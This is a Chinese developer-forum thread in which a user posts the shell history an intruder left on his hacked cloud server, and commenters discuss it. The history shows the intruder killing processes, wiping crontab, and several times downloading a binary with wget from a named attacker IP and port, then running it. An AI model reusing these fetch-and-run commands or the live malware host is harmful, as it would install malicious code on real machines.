服务器连续两天被黑、第一次被挖矿、昨天又来、和第一次不同的是、居然有 history 记录、给各位老哥看看,只图一乐

2020-01-07 09:48:18 +08:00
 dothis

从 17:01 开始

为了防止上面图片挂掉、文本如下

21 2020-01-06 09:44:38 crontab -e

22 2020-01-06 09:45:16 reboot

23 2020-01-06 09:47:02 top

24 2020-01-06 17:01:03 top

25 2020-01-06 17:01:11 ls -l /proc/3557/exe

26 2020-01-06 17:01:17 netstat -atulnp

27 2020-01-06 17:01:40 ls -l /proc/1211/exe

28 2020-01-06 17:01:44 kill -9 1211

29 2020-01-06 17:01:46 crontab -l

30 2020-01-06 17:01:47 crontab -r

31 2020-01-06 17:01:48 crontab -l

32 2020-01-06 17:01:50 cd /usr/bin/

33 2020-01-06 17:01:57 rm -rf ftucwfvnpb

34 2020-01-06 17:02:00 netstat -atulnp

35 2020-01-06 17:02:03 w

36 2020-01-06 17:02:05 cd /root/

37 2020-01-06 17:02:07 cd /bin/

38 2020-01-06 17:02:15 wget http://101.201.76.232:8082/java

39 2020-01-06 17:02:19 rm -rf java.1

40 2020-01-06 17:02:20 cd /root/

41 2020-01-06 17:02:21 cd /opt/

42 2020-01-06 17:02:31 wget http://101.201.76.232:8082/java

43 2020-01-06 17:02:35 chmod 777 java

44 2020-01-06 17:02:36 ./java

45 2020-01-06 17:02:38 cd /root/

46 2020-01-06 17:02:41 ps -xua

47 2020-01-06 17:03:28 netstat -atulnp

48 2020-01-06 17:03:47 kill -9 4689

49 2020-01-06 17:03:51 netstat -atulnp

50 2020-01-06 17:04:02 cd /etc/

51 2020-01-06 17:04:11 kill -9 6161;kill -9 6163

52 2020-01-06 17:04:15 rm -rf java

53 2020-01-06 17:04:16 cd /root/

54 2020-01-06 17:04:17 cd /bin/

55 2020-01-06 17:04:22 wget http://101.201.76.232:8082/java

56 2020-01-06 17:04:28 rm -rf java.1

57 2020-01-06 17:04:30 cd /root/

58 2020-01-06 17:04:31 cd /opt/

59 2020-01-06 17:04:33 wget http://101.201.76.232:8082/java

60 2020-01-06 17:04:36 chmod 777 java

61 2020-01-06 17:04:39 ./java

62 2020-01-06 17:04:42 cd /root/

63 2020-01-06 17:04:44 netstat -atulnp

64 2020-01-06 17:04:51 ifconfig

65 2020-01-06 17:04:54 history

66 2020-01-06 17:05:01 netstat -atulnp

67 2020-01-06 17:05:42 cd /ro

68 2020-01-06 17:05:43 cd /root/

69 2020-01-06 17:05:46 history

70 2020-01-06 17:05:53 ifconfig

71 2020-01-06 17:05:54 history

72 2020-01-06 17:05:58 w

73 2020-01-06 17:06:00 history

74 2020-01-06 17:06:24 ifconfig

75 2020-01-06 17:06:27 history

76 2020-01-06 17:06:29 history

77 2020-01-06 17:06:29 history

24819 次点击
所在节点    程序员
66 条回复
defunct9
2020-01-07 09:52:44 +08:00
有意思
dothis
2020-01-07 09:53:18 +08:00
里面还有这个人对应的 云服务器地址 手动狗头
ihciah
2020-01-07 09:54:26 +08:00
这是啥机器,挖出来的币有人工的时间值钱吗
mangoDB
2020-01-07 09:56:07 +08:00
感觉对方功夫不到家
avalon0624
2020-01-07 10:01:13 +08:00
居然用的还是国内的 ip 做,忘了服务器要实名的么?
dapang1221
2020-01-07 10:01:41 +08:00
这这这…纯手动的吗,真就服务器一日游啊,翻遍了。。。
yEhwG10ZJa83067x
2020-01-07 10:03:31 +08:00
http://101.201.76.232:8082
可以打开
oneisall8955
2020-01-07 10:04:58 +08:00
有趣有趣
moonheart
2020-01-07 10:10:23 +08:00
https://user-images.githubusercontent.com/15916990/71862696-acc76d80-3135-11ea-982d-1af3e0d41da1.png
dothis
2020-01-07 10:10:35 +08:00
@ihciah 我是腾讯云 2 核 8G5M 的机器

@mangoDB 哈哈、是的、我已经够菜了、他比我还菜

@avalon0624 是的、不过这不是最骚的、最骚的是还能访问、笑死了

@dapang1221 我也感觉、纯手动、第一次挖矿搞的还挺像样子的、这一次直接手动、并且最后好像是放弃了?因为这次好像没有成功植入病毒、只是腾讯云那边给了个提醒
dothis
2020-01-07 10:17:49 +08:00
@moonheart 系统里面没啥、就跑一些自己的小工具、多谢提醒
afirefish
2020-01-07 10:22:32 +08:00
北京 阿里云?
ReZer0
2020-01-07 10:23:44 +08:00
话说我好奇的点在于是怎么被黑进去的……
rongyiran
2020-01-07 10:27:31 +08:00
用的是肉鸡控制你的啊.
gearfox
2020-01-07 10:28:13 +08:00
还是个爱打 cs 的朋友
dothis
2020-01-07 10:31:57 +08:00
@afirefish 是的、对方是北京阿里云

@ReZer0 目前我很怀疑是 BT 导致的、因为我自己的安装 BT 没多久、同时我们公司服务器、我也想安装一个 BT 想使用起来(图方便)、结果还没用、周末就中毒(就隔天)、很多文件都被删了。辛亏有快照、不然直接凉。目前只是解决问题。
mango88
2020-01-07 10:54:43 +08:00
惊了,CS
LengthMin
2020-01-07 10:56:02 +08:00
BT 是宝塔吗?
afirefish
2020-01-07 10:58:56 +08:00
@dothis BT 是宝塔吗?我一台腾讯云的服务器上面也跑了 BT,目前暂时还没有被黑过(或者是我菜,不知道被黑了)。不过我一般在腾讯云的安全组里面吧宝塔管理面板和 SSH 的端口都关了的,要用的时候再打开。
Pzqqt
2020-01-07 11:05:34 +08:00
@justrand 访问 http://101.201.76.232 之后返回 Nginx 欢迎页面 然后火绒报毒。。。

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/635675

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX